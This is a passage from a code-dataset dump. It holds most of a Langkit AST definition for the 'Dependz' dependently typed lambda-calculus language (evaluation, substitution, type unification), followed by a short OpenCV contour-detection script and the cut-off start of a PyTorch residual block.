x: combine(x, combine(l, r))\n ),\n default_val=combine(l, r)\n )\n )\n )\n )\n )\n\n @langkit_property(return_type=T.Bool, public=True)\n def is_free(sym=T.Symbol):\n return Self.match(\n lambda id=Identifier:\n id.sym == sym,\n\n lambda ap=Apply:\n ap.lhs.is_free(sym) | ap.rhs.is_free(sym),\n\n lambda ab=Abstraction:\n (ab.ident.sym != sym) & ab.term.is_free(sym),\n\n lambda ar=Arrow:\n ar.lhs.is_free(sym)\n | ar.rhs.is_free(sym)\n | ar.binder._.is_free(sym)\n )\n\n @langkit_property(return_type=T.Symbol)\n def free_fresh_symbol(prefix=T.Symbol, other=(T.Term, No(T.Term)),\n i=(T.Int, 0)):\n sym = Var(Self.concat_symbol_and_integer(prefix, i))\n return If(\n And(Self.is_free(sym), Or(other.is_null, other.is_free(sym))),\n Self.free_fresh_symbol(prefix, other, i + 1),\n sym\n )\n\n @langkit_property(return_type=T.Term)\n def eval_case(matches=T.Term, then_case=T.Term, else_case=T.Term):\n constr = Var(matches.cast_or_raise(Identifier))\n return Cond(\n Self.cast(Identifier)._.sym == constr.sym,\n then_case.eval,\n\n Self.cast(Apply)._.left_most_term.cast(Identifier)\n ._.sym == constr.sym,\n Self.cast(Apply).replace_left_most_term_with(then_case).eval,\n\n else_case._.extract_case_and_eval(Self)\n\n # todo: handle arrows here?\n )\n\n @langkit_property(return_type=T.Term)\n def extract_case_and_eval(arg=T.Term):\n case_expr = Var(Self.cast_or_raise(Apply))\n case_id = Var(case_expr.left_most_term.cast(Identifier))\n case_lhs = Var(case_expr.lhs.cast_or_raise(Apply))\n has_else = Var(case_lhs.lhs != case_id)\n return If(\n case_id._.sym == \"case\",\n If(\n has_else,\n arg.eval_case(\n case_lhs.lhs.cast_or_raise(Apply).rhs,\n case_lhs.rhs,\n case_expr.rhs\n ),\n arg.eval_case(\n case_lhs.rhs,\n case_expr.rhs,\n No(T.Term)\n )\n ),\n PropertyError(T.Term, \"expected `case`\")\n )\n\n @langkit_property(return_type=T.Bool, memoized=True)\n def is_match_application():\n elim_call = Var(Self.cast(Apply))\n elim_evaled = Var(elim_call._.lhs.eval.cast(Apply))\n elim_id = Var(elim_evaled._.lhs)\n return elim_id.cast(Identifier)._.sym == \"match\"\n\n @langkit_property(return_type=T.Term, memoized=True)\n def eval_match():\n elim_call = Var(Self.cast_or_raise(Apply))\n elim_evaled = Var(elim_call.lhs.eval.cast(Apply))\n return If(\n Self.is_match_application,\n elim_evaled.rhs.extract_case_and_eval(\n elim_call.rhs.eval\n )._or(Self),\n Self\n )\n\n @langkit_property(public=True, return_type=T.Term, memoized=True)\n def eval():\n return Self.match(\n lambda id=Identifier: id.intro._.definition.then(\n lambda d: d.term.node.eval,\n default_val=id\n ),\n lambda ap=Apply: ap.lhs.eval.cast(Abstraction).then(\n lambda ab: ab.term.substitute(ab.ident.sym, ap.rhs).eval,\n default_val=ap.eval_match\n ),\n lambda ab=Abstraction: ab.term.cast(Apply).then(\n lambda ap: If(\n And(\n ap.rhs.cast(Identifier)._.sym == ab.ident.sym,\n Not(ap.lhs.is_free(ab.ident.sym))\n ),\n ap.lhs.eval,\n ab\n ),\n )._or(ab),\n lambda ar=Arrow: ar\n )\n\n @langkit_property(public=True, return_type=T.Bool)\n def equivalent_entities(other=T.Term.entity):\n return Entity.node.equivalent(other.node)\n\n @langkit_property(return_type=T.Bool, memoized=True)\n def equivalent(other=T.Term):\n return Self.match(\n lambda id=Identifier: other.cast(Identifier).then(\n lambda o: o.sym == id.sym\n ),\n lambda ap=Apply: other.cast(Apply).then(\n lambda o: And(\n ap.lhs.equivalent(o.lhs),\n ap.rhs.equivalent(o.rhs)\n )\n ),\n lambda ab=Abstraction: other.cast(Abstraction).then(\n lambda o: ab.term.free_fresh_symbol(\"eq\", o.term).then(\n lambda sym:\n ab.term.rename(ab.ident.sym, sym).equivalent(\n o.term.rename(o.ident.sym, sym)\n )\n )\n ),\n lambda ar=Arrow: other.cast(Arrow).then(\n lambda o: And(\n ar.lhs.equivalent(o.lhs),\n ar.rhs.equivalent(o.rhs),\n ar.binder.then(\n lambda b: o.binder.then(\n lambda ob: Or(\n b.equivalent(ob),\n And(\n Not(ar.has_constraining_binder),\n Not(o.has_constraining_binder)\n )\n ),\n default_val=Not(ar.has_constraining_binder)\n ),\n default_val=Not(o.has_constraining_binder)\n )\n )\n )\n )\n\n @langkit_property(return_type=T.Term)\n def substitute_all(substs=Substitution.array, idx=(T.Int, 0),\n unsafe=(T.Bool, False)):\n return substs.at(idx).then(\n lambda r: Self.substitute(\n r.from_symbol,\n r.to_term,\n unsafe\n ).substitute_all(\n substs, idx + 1, unsafe\n ),\n default_val=Self\n )\n\n @langkit_property(public=True, return_type=T.Term, memoized=True)\n def substitute(sym=T.Symbol, val=T.Term, unsafe=(T.Bool, False)):\n return Self.match(\n lambda id=Identifier: If(\n id.sym == sym,\n val,\n id\n ),\n lambda ap=Apply: ap.make_apply(\n ap.lhs.substitute(sym, val, unsafe),\n ap.rhs.substitute(sym, val, unsafe)\n ),\n lambda ab=Abstraction: If(\n ab.ident.sym == sym,\n ab,\n If(\n val.is_free(ab.ident.sym) & Not(unsafe),\n ab.term.free_fresh_symbol(ab.ident.sym).then(\n lambda symp: ab.make_abstraction(\n ab.make_ident(symp),\n ab.term\n .rename(ab.ident.sym, symp)\n .substitute(sym, val, False)\n )\n ),\n ab.make_abstraction(\n ab.ident,\n ab.term.substitute(sym, val, unsafe)\n )\n )\n ),\n lambda ar=Arrow: Self.make_arrow(\n ar.lhs.substitute(sym, val, unsafe),\n ar.rhs.substitute(sym, val, unsafe),\n ar.binder._.substitute(sym, val, unsafe)\n )\n )\n\n @langkit_property(return_type=T.Term, memoized=True)\n def anti_substitute(val=T.Term, sym=T.Symbol):\n return If(\n Self.equivalent(val),\n Self.make_ident(sym),\n Self.match(\n lambda id=Identifier: id,\n lambda ap=Apply: ap.make_apply(\n ap.lhs.anti_substitute(val, sym),\n ap.rhs.anti_substitute(val, sym)\n ),\n lambda ab=Abstraction: ab.make_abstraction(\n ab.ident.anti_substitute(val, sym)\n .cast_or_raise(Identifier),\n ab.term.anti_substitute(val, sym)\n ),\n lambda ar=Arrow: ar.make_arrow(\n ar.lhs.anti_substitute(val, sym),\n ar.rhs.anti_substitute(val, sym),\n ar.binder._.anti_substitute(val, sym)\n )\n )\n )\n\n @langkit_property(return_type=T.Bool, memoized=True)\n def contains_term(t=T.Term, include_self=(T.Bool, False)):\n return If(\n include_self & Self.equivalent(t),\n True,\n Self.match(\n lambda id=Identifier: False,\n lambda ap=Apply: Or(\n ap.lhs.contains_term(t, True),\n ap.rhs.contains_term(t, True)\n ),\n lambda ab=Abstraction: Or(\n ab.ident.contains_term(t, True),\n ab.term.contains_term(t, True)\n ),\n lambda ar=Arrow: Or(\n ar.lhs.contains_term(t, True),\n ar.rhs.contains_term(t, True),\n ar.binder._.contains_term(t, True)\n )\n )\n )\n\n @langkit_property(return_type=T.Term.entity)\n def normalized_entities():\n return Entity.node.normalize.as_entity\n\n @langkit_property(public=True, return_type=T.Term, memoized=True)\n def normalize():\n evaled = Var(Self.eval)\n to_norm = Var(Cond(\n # prevent infinite evaluation\n evaled.contains_term(Self),\n Self,\n\n Not(Self.is_free(\"match\")) & evaled.is_free(\"match\"),\n Self,\n\n evaled\n ))\n\n return to_norm.match(\n lambda id=Identifier: id,\n lambda ap=Apply: ap.make_apply(\n ap.lhs.normalize,\n ap.rhs.normalize\n ),\n lambda ab=Abstraction: ab.make_abstraction(\n ab.ident,\n ab.term.normalize\n ),\n lambda ar=Arrow: ar.make_arrow(\n ar.lhs.normalize,\n ar.rhs.normalize,\n ar.binder._.normalize\n )\n )\n\n @langkit_property(return_type=T.Term)\n def rename_all(renamings=Renaming.array, idx=(T.Int, 0)):\n return renamings.at(idx).then(\n lambda r:\n Self.rename(r.from_symbol, r.to_symbol).rename_all(\n renamings, idx + 1\n ),\n default_val=Self\n )\n\n @langkit_property(return_type=T.Term, public=True, memoized=True)\n def rename(old=T.Symbol, by=T.Symbol):\n return Self.match(\n lambda id=Identifier: If(\n id.sym == old,\n id.make_ident(by),\n id\n ),\n lambda ap=Apply: ap.make_apply(\n ap.lhs.rename(old, by),\n ap.rhs.rename(old, by)\n ),\n lambda ab=Abstraction: If(\n old == ab.ident.sym,\n ab,\n ab.make_abstraction(\n ab.ident,\n ab.term.rename(old, by)\n )\n ),\n lambda ar=Arrow: ar.make_arrow(\n ar.lhs.rename(old, by),\n ar.rhs.rename(old, by),\n ar.binder._.rename(old, by)\n )\n )\n\n @langkit_property(return_type=T.LogicVar, memoized=True)\n def domain_var():\n return Self.create_logic_var\n\n @langkit_property(return_type=T.Identifier.array)\n def find_occurrences(sym=T.Symbol):\n return Self.match(\n lambda id=Identifier: If(\n id.sym == sym,\n id.singleton,\n No(Identifier.array)\n ),\n\n lambda ap=Apply:\n ap.lhs.find_occurrences(sym)\n .concat(ap.rhs.find_occurrences(sym)),\n\n lambda ab=Abstraction: If(\n ab.ident.sym == sym,\n No(Identifier.array),\n ab.term.find_occurrences(sym)\n ),\n\n lambda ar=Arrow:\n ar.lhs.find_occurrences(sym)\n .concat(ar.rhs.find_occurrences(sym))\n .concat(ar.binder._.find_occurrences(sym))\n )\n\n @langkit_property(return_type=T.Term.array)\n def flat_terms():\n return Self.singleton.concat(Self.match(\n lambda ap=Apply:\n ap.lhs.flat_terms.concat(ap.rhs.flat_terms),\n\n lambda ab=Abstraction:\n ab.ident.flat_terms.concat(ab.term.flat_terms),\n\n lambda ar=Arrow:\n ar.lhs.flat_terms\n .concat(ar.rhs.flat_terms)\n .concat(ar.binder._.flat_terms),\n\n lambda _: No(Term.array)\n ))\n\n @langkit_property(return_type=T.DomainEquation,\n uses_entity_info=False,\n activate_tracing=True)\n def domain_equation(bindings=Binding.array):\n relevant_binding = Var(bindings.find(\n lambda b: b.target == Self\n ))\n\n result = Var(Self.match(\n lambda id=Identifier: id.intro.then(\n lambda intro: Cond(\n Not(relevant_binding.is_null),\n DomainEquation.new(\n eq=LogicTrue(),\n templates=No(Identifier.array)\n ),\n\n intro.generic_formals.length > 0,\n DomainEquation.new(\n eq=LogicTrue(),\n templates=id.singleton\n ),\n\n DomainEquation.new(\n eq=Bind(\n Self.domain_var, intro.term.normalized_entities,\n conv_prop=Term.normalized_entities,\n eq_prop=Term.equivalent_entities\n ),\n templates=No(Identifier.array)\n )\n ),\n default_val=DomainEquation.new(\n eq=LogicTrue(),\n templates=No(Identifier.array)\n )\n ),\n lambda ap=Apply: Let(\n lambda\n lhs_eq=ap.lhs.domain_equation(bindings),\n rhs_eq=ap.rhs.domain_equation(bindings):\n\n DomainEquation.new(\n eq=And(\n lhs_eq.eq,\n rhs_eq.eq,\n Bind(ap.lhs.domain_var, ap.rhs.domain_var,\n conv_prop=Arrow.param,\n eq_prop=Term.equivalent_entities),\n Bind(ap.lhs.domain_var, ap.domain_var,\n conv_prop=Arrow.result,\n eq_prop=Term.equivalent_entities)\n ),\n templates=lhs_eq.templates.concat(rhs_eq.templates)\n )\n ),\n lambda ab=Abstraction: Let(\n lambda term_eq=ab.term.domain_equation(bindings):\n\n DomainEquation.new(\n eq=And(\n ab.term.find_occurrences(ab.ident.sym).logic_all(\n lambda id: Bind(\n ab.ident.domain_var, id.domain_var,\n conv_prop=Term.normalized_entities,\n eq_prop=Term.equivalent_entities\n ),\n ),\n Bind(ab.domain_var, ab.ident.domain_var,\n conv_prop=Arrow.param,\n eq_prop=Term.equivalent_entities),\n Bind(ab.domain_var, ab.term.domain_var,\n conv_prop=Arrow.result,\n eq_prop=Term.equivalent_entities),\n term_eq.eq\n ),\n templates=term_eq.templates\n )\n ),\n\n lambda ar=Arrow: Let(\n lambda\n lhs_eq=ar.lhs.domain_equation(bindings),\n rhs_eq=ar.rhs.domain_equation(bindings),\n binder_eq=ar.binder.then(\n lambda b: b.domain_equation(bindings),\n default_val=DomainEquation.new(\n eq=LogicTrue(),\n templates=No(Identifier.array)\n )\n ):\n\n DomainEquation.new(\n eq=And(\n lhs_eq.eq,\n rhs_eq.eq,\n binder_eq.eq,\n\n ar.binder.then(\n lambda b: Bind(\n b.domain_var, ar.lhs.normalize.as_bare_entity,\n eq_prop=Term.equivalent_entities\n ),\n default_val=LogicTrue()\n ),\n\n Or(\n And(\n Predicate(Term.is_highest_ranked_term,\n ar.lhs.domain_var, ar.rhs.domain_var),\n Bind(ar.domain_var, ar.lhs.domain_var,\n eq_prop=Term.equivalent_entities),\n ),\n And(\n Predicate(Term.is_highest_ranked_term,\n ar.rhs.domain_var, ar.lhs.domain_var),\n Bind(ar.domain_var, ar.rhs.domain_var,\n eq_prop=Term.equivalent_entities)\n )\n )\n ),\n templates=lhs_eq.templates.concat(\n rhs_eq.templates\n ).concat(\n binder_eq.templates\n )\n )\n )\n ))\n\n return relevant_binding.then(\n lambda b: DomainEquation.new(\n eq=Bind(\n Self.domain_var, b.domain_val.as_bare_entity,\n eq_prop=Term.equivalent_entities\n ) & result.eq,\n templates=result.templates\n ),\n default_val=result\n )\n\n @langkit_property(public=False, return_type=TypingsDescription,\n activate_tracing=True)\n def instantiate_templates(result_domain=T.Term,\n templates=Template.array,\n reps=T.Substitution.array):\n must_synthesize_arrow = Var(\n Self.cast(Abstraction).then(\n lambda ab: result_domain.cast(Arrow).then(\n lambda ar: False,\n default_val=True\n ),\n default_val=False\n )\n )\n actual_result_domain = Var(If(\n must_synthesize_arrow,\n Let(\n lambda\n lhs_sym=Self.unique_fresh_symbol(\"lhs\"),\n rhs_sym=Self.unique_fresh_symbol(\"rhs\"),\n binder_sym=Self.unique_fresh_symbol(\"binder\"):\n\n Self.make_arrow(\n Self.make_ident(lhs_sym),\n Self.make_ident(rhs_sym),\n Self.make_ident(binder_sym)\n )\n ),\n result_domain\n ))\n instantiation = Var(Self.instantiate_templates_impl(\n actual_result_domain,\n templates,\n reps\n ))\n return If(\n must_synthesize_arrow,\n Let(\n lambda ar=actual_result_domain.cast_or_raise(Arrow):\n\n TypingsDescription.new(\n bindings=instantiation.bindings,\n equations=instantiation.equations.concat(\n UnifyQuery.new(\n first=ar,\n second=result_domain\n ).singleton\n ),\n new_symbols=instantiation.new_symbols.concat(\n ArrayLiteral([\n ar.lhs.cast(Identifier).sym,\n ar.rhs.cast(Identifier).sym,\n ar.binder.cast(Identifier).sym\n ])\n )\n )\n ),\n instantiation\n )\n\n @langkit_property(public=False, return_type=TypingsDescription)\n def instantiate_templates_impl(result_domain=T.Term,\n templates=Template.array,\n reps=T.Substitution.array):\n def make_binding(domain):\n return Binding.new(\n target=Self,\n domain_val=domain\n )\n\n def rec_apply(ap, f):\n return Let(\n lambda\n lhs_res=ap.lhs.instantiate_templates(\n result_domain.then(\n lambda r_dom: Self.make_arrow(No(T.Term), r_dom)\n ),\n templates,\n reps\n ): Let(\n lambda\n rhs_res=ap.rhs.instantiate_templates(\n lhs_res.bindings.at(0).domain_val.cast(Arrow)._.lhs,\n templates, reps\n ):\n\n f(lhs_res, rhs_res)\n )\n )\n\n templated_result = Var(Self.match(\n lambda id=Identifier: TypingsDescription.new(\n bindings=templates.find(lambda t: t.origin == id).then(\n lambda t: t.instance,\n default_val=id.domain_val._or(result_domain)\n ).then(\n lambda dom: make_binding(dom)\n ).singleton,\n\n equations=No(UnifyQuery.array),\n\n new_symbols=No(Symbol.array)\n ),\n\n lambda ap=Apply: rec_apply(\n ap,\n lambda lhs_res, rhs_res: Let(\n lambda qs=rhs_res.bindings.at(0).domain_val.then(\n lambda rhs_dom: UnifyQuery.new(\n first=lhs_res.bindings.at(0)\n .domain_val.cast(Arrow).lhs,\n second=rhs_dom\n ).singleton\n ).concat(\n lhs_res.bindings.at(0)\n .domain_val.cast(Arrow)._.binder.then(\n lambda b: UnifyQuery.new(\n first=b,\n second=rhs_res.bindings.at(0)\n .target.substitute_all(reps).normalize\n ).singleton\n )\n ):\n\n TypingsDescription.new(\n bindings=make_binding(\n lhs_res.bindings.at(0)\n .domain_val.cast_or_raise(Arrow).rhs\n ).singleton.concat(\n lhs_res.bindings\n ).concat(\n rhs_res.bindings\n ),\n\n equations=lhs_res.equations.concat(\n rhs_res.equations\n ).concat(\n qs\n ),\n\n new_symbols=lhs_res.new_symbols.concat(\n rhs_res.new_symbols\n )\n )\n )\n ),\n\n lambda ab=Abstraction: Let(\n lambda\n term_res=ab.term.instantiate_templates(\n result_domain.cast(Arrow)._.rhs,\n templates,\n reps.filter(\n lambda s: s.from_symbol != ab.ident.sym\n ).concat(result_domain.cast(Arrow)._.binder.then(\n lambda b: Substitution.new(\n from_symbol=ab.ident.sym,\n to_term=b\n ).singleton\n ))\n ),\n id_dom=ab.ident.domain_val._or(\n result_domain.cast(Arrow)._.lhs\n ):\n\n TypingsDescription.new(\n bindings=id_dom.then(\n lambda lhs_dom:\n\n term_res.bindings.at(0).domain_val.then(\n lambda rhs_dom: make_binding(\n Self.make_arrow(\n lhs_dom,\n rhs_dom,\n result_domain.cast(Arrow)._.binder\n )\n )\n )\n ).singleton.concat(term_res.bindings),\n\n equations=term_res.equations.concat(id_dom.then(\n lambda lhs_dom:\n ab.term.find_occurrences(ab.ident.sym).map(\n lambda id: term_res.bindings.find(\n lambda b: b.target == id\n ).then(\n lambda b: UnifyQuery.new(\n first=lhs_dom,\n second=b.domain_val\n )\n )\n )\n )),\n\n new_symbols=term_res.new_symbols\n )\n ),\n\n lambda ar=Arrow: Let(\n lambda\n lhs_res=ar.lhs.instantiate_templates(\n No(Term), templates, reps\n ),\n rhs_res=ar.rhs.instantiate_templates(\n No(Term), templates, reps\n ),\n binder_res=ar.binder.then(\n lambda b: b.instantiate_templates(\n ar.lhs, templates, reps\n )\n ),\n new_sym=Self.unique_fresh_symbol(\"arrow\"):\n\n TypingsDescription.new(\n bindings=make_binding(\n Self.make_ident(new_sym)\n ).singleton.concat(\n lhs_res.bindings\n ).concat(\n rhs_res.bindings\n ).concat(\n binder_res.bindings\n ),\n\n equations=lhs_res.equations.concat(\n rhs_res.equations\n ).concat(\n binder_res.equations\n ),\n\n new_symbols=new_sym.singleton.concat(\n lhs_res.new_symbols\n ).concat(\n rhs_res.new_symbols\n )\n )\n )\n ))\n\n return Self.domain_val.then(\n lambda expected_dom:\n\n templated_result.bindings.at(0).domain_val.then(\n lambda found_dom: Let(\n lambda q=UnifyQuery.new(\n first=found_dom,\n second=expected_dom\n ):\n\n TypingsDescription.new(\n bindings=templated_result.bindings,\n equations=q.singleton.concat(\n templated_result.equations\n ),\n new_symbols=templated_result.new_symbols\n )\n )\n ),\n default_val=templated_result\n )\n\n @langkit_property(return_type=Bool)\n def reset_domain_vars():\n return Self.flat_terms.logic_all(\n lambda x: Bind(x.domain_var, No(Term.entity))\n ).solve\n\n @langkit_property(public=False, return_type=T.Bool)\n def check_domains_internal(expected_domain=T.Term,\n bindings=Binding.array, tries=T.Int):\n term_eq = Var(Self.domain_equation(bindings))\n domain_eq = Var(And(\n Bind(Self.domain_var, expected_domain.as_bare_entity,\n eq_prop=Term.equivalent_entities),\n term_eq.eq\n ))\n return term_eq.templates.then(\n lambda templates: (tries != 0) & Try(\n Self.solve_allowing_orphans(domain_eq),\n True\n ).then(lambda _: Let(\n lambda instances=templates.map(\n lambda t: t.intro.as_template(t)\n ):\n\n Self.instantiate_templates(\n expected_domain,\n instances,\n No(Substitution.array)\n ).then(lambda result: Self.check_domains_internal(\n expected_domain,\n Let(\n lambda substs=Self.unify_all(\n result.equations,\n instances.mapcat(\n lambda i: i.new_symbols\n ).concat(\n result.new_symbols\n )\n ): result.bindings.map(\n lambda b: Binding.new(\n target=b.target,\n domain_val=\n b.domain_val.substitute_all(substs).normalize\n )\n ).filter(\n lambda b: b.domain_val.free_symbols.all(\n lambda sym: Not(instances.any(\n lambda i: i.new_symbols.contains(sym)\n ))\n )\n )\n ),\n tries - 1\n ))\n )),\n default_val=domain_eq.solve\n )\n\n @langkit_property(return_type=T.Bool, activate_tracing=True,\n dynamic_vars=[unification_context])\n def has_domain(domain_val=T.Term.entity):\n constrained_term = Var(Self.solve_time_substitution)\n domain_term = Var(domain_val.node.solve_time_substitution)\n\n ignore(Var(constrained_term.reset_domain_vars))\n\n return Try(\n constrained_term.check_domains_internal(\n domain_term, No(Binding.array), -1\n ),\n False\n )\n\n @langkit_property(return_type=T.Equation,\n dynamic_vars=[unification_context])\n def has_domain_equation(other=T.Term):\n # Use the fact that predicates with more than 1 var are evaluated last\n vars = Var(unification_context.vars)\n term_var = Var(vars.elem(Self.unique_fresh_symbol(\"$tmp_trm\")))\n domain_var = Var(vars.elem(Self.unique_fresh_symbol(\"$tmp_dom\")))\n return And(\n Bind(term_var, Self.as_bare_entity),\n Bind(domain_var, other.as_bare_entity),\n Predicate(Term.has_domain, term_var, domain_var)\n )\n\n @langkit_property(return_type=T.Term, public=True)\n def domain_val():\n return Self.domain_var.get_value._.node.cast_or_raise(Term)\n\n @langkit_property(return_type=T.Bool)\n def is_highest_ranked_term(other=DependzNode.entity):\n other_term = Var(other.cast_or_raise(Term).node)\n return Self.self_or_higher_ranked_term(other_term) == Self\n\n @langkit_property(return_type=T.Term, memoized=True)\n def self_or_higher_ranked_term(other=T.Term):\n self_chain = Var(Self.domain_chain)\n other_chain = Var(other.domain_chain)\n first_common = Var(self_chain.find(\n lambda d1: other_chain.any(\n lambda d2: d1.equivalent(d2)\n )\n ))\n return first_common._or(PropertyError(Term, \"Terms are incompatible\"))\n\n @langkit_property(return_type=T.Term.array, memoized=True)\n def domain_chain():\n id = Var(Self.cast_or_raise(Identifier))\n domain = Var(id.intro._.term)\n return Self.singleton.concat(If(\n domain.cast(Identifier).then(lambda d: d.intro._.term == domain),\n domain.node.singleton,\n domain._.domain_chain\n ))\n\n\n@abstract\nclass Identifier(Term):\n sym = AbstractProperty(type=Symbol)\n\n to_string = Property(Self.sym.image)\n\n @langkit_property(public=True, return_type=T.Bool)\n def is_introducing():\n return Self.parent.cast(Introduction).then(\n lambda i: i.ident == Self\n )\n\n @langkit_property(public=True, return_type=T.Introduction.entity,\n memoized=True)\n def intro():\n return Self.node_env.get_first(Self.sym).cast(Introduction)\n\n\nclass SourceId(Identifier):\n token_node = True\n sym = Property(Self.symbol)\n\n\n@synthetic\nclass SyntheticId(Identifier):\n name = UserField(type=T.Symbol)\n sym = Property(Self.name)\n\n\nclass Apply(Term):\n lhs = Field(type=Term)\n rhs = Field(type=Term)\n\n to_string = Property(String(\"(\").concat(\n Self.lhs.to_string.concat(String(' ')).concat(Self.rhs.to_string)\n ).concat(String(\")\")))\n\n @langkit_property(return_type=Term)\n def left_most_term():\n return Self.lhs.cast(Apply).then(\n lambda ap: ap.left_most_term,\n default_val=Self.lhs\n )\n\n @langkit_property(return_type=Term)\n def replace_left_most_term_with(other=Term):\n return Self.make_apply(\n Self.lhs.cast(Apply).then(\n lambda ap: ap.replace_left_most_term_with(other),\n default_val=other\n ),\n Self.rhs\n )\n\n @langkit_property(return_type=Term.entity.array, public=True)\n def as_term_array():\n return Self.left_most_term.as_bare_entity.singleton.concat(\n Self.call_args.map(lambda x: x.as_bare_entity)\n )\n\n\n@synthetic\nclass SyntheticApply(Apply):\n pass\n\n\nclass Abstraction(Term):\n ident = Field(type=Identifier)\n term = Field(type=Term)\n\n @langkit_property()\n def to_string():\n actual_self = Var(If(\n Self.is_synthesized,\n Self.first_available_standard_symbol.then(\n lambda s: Self.make_abstraction(\n Self.make_ident(s),\n Self.term.rename(Self.ident.sym, s)\n ),\n default_val=Self\n ),\n Self,\n ))\n return String(\"(\\\\\").concat(\n actual_self.ident.to_string.concat(String('. ')).concat(\n actual_self.term.to_string\n )\n ).concat(String(\")\"))\n\n @langkit_property(return_type=Bool)\n def is_synthesized():\n return Self.ident.to_string.contains(CharacterLiteral(\"$\"))\n\n @langkit_property(return_type=Symbol)\n def first_available_standard_symbol():\n return ArrayLiteral([\"x\", \"y\", \"z\", \"e\"], element_type=T.Symbol).find(\n lambda s: Not(Self.term.is_free(s))\n )\n\n\n@synthetic\nclass SyntheticAbstraction(Abstraction):\n pass\n\n\nclass Arrow(Term):\n binder = Field(type=Term)\n lhs = Field(type=Term)\n rhs = Field(type=Term)\n\n @langkit_property()\n def to_string():\n lhs_str = Var(Self.lhs._.to_string)\n rhs_str = Var(Self.rhs.to_string)\n return String('(').concat(Self.binder.then(\n lambda b: If(\n Self.has_constraining_binder,\n b.to_string.concat(String(':')).concat(lhs_str),\n lhs_str\n ),\n default_val=lhs_str\n ).concat(String(' -> ')).concat(rhs_str).concat(String(')')))\n\n @langkit_property(return_type=Term.entity)\n def param():\n return Entity.lhs.normalized_entities\n\n @langkit_property(return_type=Term.entity)\n def result():\n return Entity.rhs.normalized_entities\n\n @langkit_property(return_type=T.Bool)\n def has_constraining_binder():\n return Self.binder.then(\n lambda b: b.cast(Identifier).then(\n lambda id: If(\n id.intro.is_null,\n Self.lhs.is_free(id.sym) | Self.rhs.is_free(id.sym),\n True\n ),\n default_val=True\n )\n )\n\n\n@synthetic\nclass SyntheticArrow(Arrow):\n pass\n\n\nclass Introduction(DependzNode):\n \"\"\"\n Identifer : Term\n \"\"\"\n ident = Field(type=Identifier)\n term = Field(type=Term)\n\n @langkit_property(public=True, return_type=T.Definition.entity,\n memoized=True)\n def definition():\n return Self.children_env.get_first('__definition').cast(T.Definition)\n\n @langkit_property(public=True, return_type=T.Symbol.array,\n memoized=True)\n def generic_formals():\n return Self.term.free_symbols\n\n @langkit_property(public=True, return_type=Template)\n def as_template(origin_term=T.Term):\n renamings = Var(Self.generic_formals.map(lambda s: Renaming.new(\n from_symbol=s,\n to_symbol=Self.unique_fresh_symbol(s)\n )))\n return Template.new(\n origin=origin_term,\n instance=Self.term.rename_all(renamings).normalize,\n new_symbols=renamings.map(lambda r: r.to_symbol)\n )\n\n env_spec = EnvSpec(\n add_to_env_kv(Self.ident.sym, Self),\n add_env()\n )\n\n\n@synthetic\nclass NestedIntroduction(Introduction):\n bound_generics = UserField(type=T.Symbol.array)\n\n @langkit_property()\n def generic_formals():\n return Self.term.free_symbols.filter(\n lambda s: Not(Self.bound_generics.contains(s))\n )\n\n\nclass Definition(DependzNode):\n \"\"\"\n Identifier = Term\n \"\"\"\n ident = Field(type=SourceId)\n term = Field(type=Term)\n\n @langkit_property(public=True, return_type=T.String)\n def eval_and_print():\n return Self.term.normalize.to_string\n\n @langkit_property(public=True, return_type=T.Bool)\n def check_domains(tries=(T.Int, -1)):\n return Self.term.check_domains_internal(\n Self.ident.intro.term.normalize,\n No(Binding.array), tries\n )\n\n env_spec = EnvSpec(\n handle_children(),\n add_to_env_kv(\n '__definition', Self,\n dest_env=Self.ident.intro.children_env\n )\n )\n\n\nclass Program(DependzNode.list):\n @langkit_property(return_type=Introduction.array,\n memoized=True)\n def all_introductions():\n return Self.children_env.get(No(T.Symbol)).filtermap(\n lambda n: n.cast(Introduction).node,\n lambda n: n.is_a(Introduction)\n )\n\n @langkit_property(return_type=Introduction.array,\n memoized=True)\n def all_constructors():\n return Self.all_introductions.filter(\n lambda n: n.definition.is_null\n )\n\n env_spec = EnvSpec(\n add_env()\n )\n","repo_name":"Roldak/Dependz","sub_path":"dependz/language/ast.py","file_name":"ast.py","file_ext":"py","file_size_in_byte":86617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25390508318","text":"import cv2\r\nimport numpy as np\r\nimg = cv2.imread(\"meterP.PNG\")\r\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\ncanny = cv2.Canny(gray, 50, 200)\r\nB = 0\r\nG = 0\r\nR = 0\r\nn = 0\r\nr = 8\r\nh = w = r * 2 + 1\r\nkernel = np.zeros((h, w), dtype=np.uint8)\r\ncv2.circle(kernel, (r, r), r, 1, -1) \r\nopeningimg = cv2.morphologyEx(gray, cv2.MORPH_OPEN, kernel)\r\nret,markerImag = cv2.threshold(openingimg,50,255,cv2.THRESH_BINARY_INV)\r\n\r\ncontours, hierarchy = cv2.findContours(markerImag,cv2.cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\r\nprint(len(contours))\r\nclone = img.copy()\r\nclone2 = img.copy()\r\narea=[]\r\nfor c in contours:\r\n area.append(cv2.contourArea(c))\r\nmax_area = np.argmax(np.array(area))\r\ncv2.drawContours(clone2, contours, max_area, (0, 255, 0), cv2.FILLED)\r\n#cv2.fillPoly(clone2, max_area, (0,0,255))\r\n\"\"\"\r\nfor c in contours:\r\n (x, y, w, h) = cv2.boundingRect(c)\r\n cv2.rectangle(clone, (x, y), (x + w, y + h), (0, 255, 0), 2)\r\n\"\"\" \r\n\"\"\"\r\nfor c in contours:\r\n if len(c)>100:\r\n cv2.drawContours(clone, c, -1, (0, 255, 0), 2)\r\n\"\"\"\r\ncv2.imshow('openingimg', openingimg)\r\ncv2.imshow('markerImag', markerImag)\r\ncv2.imshow('img', img)\r\ncv2.imshow('clone2', clone2)\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()","repo_name":"chuyc511/Embedded_image","sub_path":"AnalogGauge/Gauge/Contour.py","file_name":"Contour.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28517264789","text":"import torch\nimport torch.nn as nn\n#import torch.nn.functional as F\nfrom opts import options\n\nopt = options()\n\ndef conv3x3(iChannels, oChannels, stride):\n return nn.Conv2d(iChannels, oChannels, (3, 3), (stride, stride), (1, 1))\n\ndef conv1x1(iChannels, oChannels, stride):\n return nn.Conv2d(iChannels, oChannels, (1, 1), (stride, stride), (0, 0))\n\nclass resBlock(nn.Module):\n def 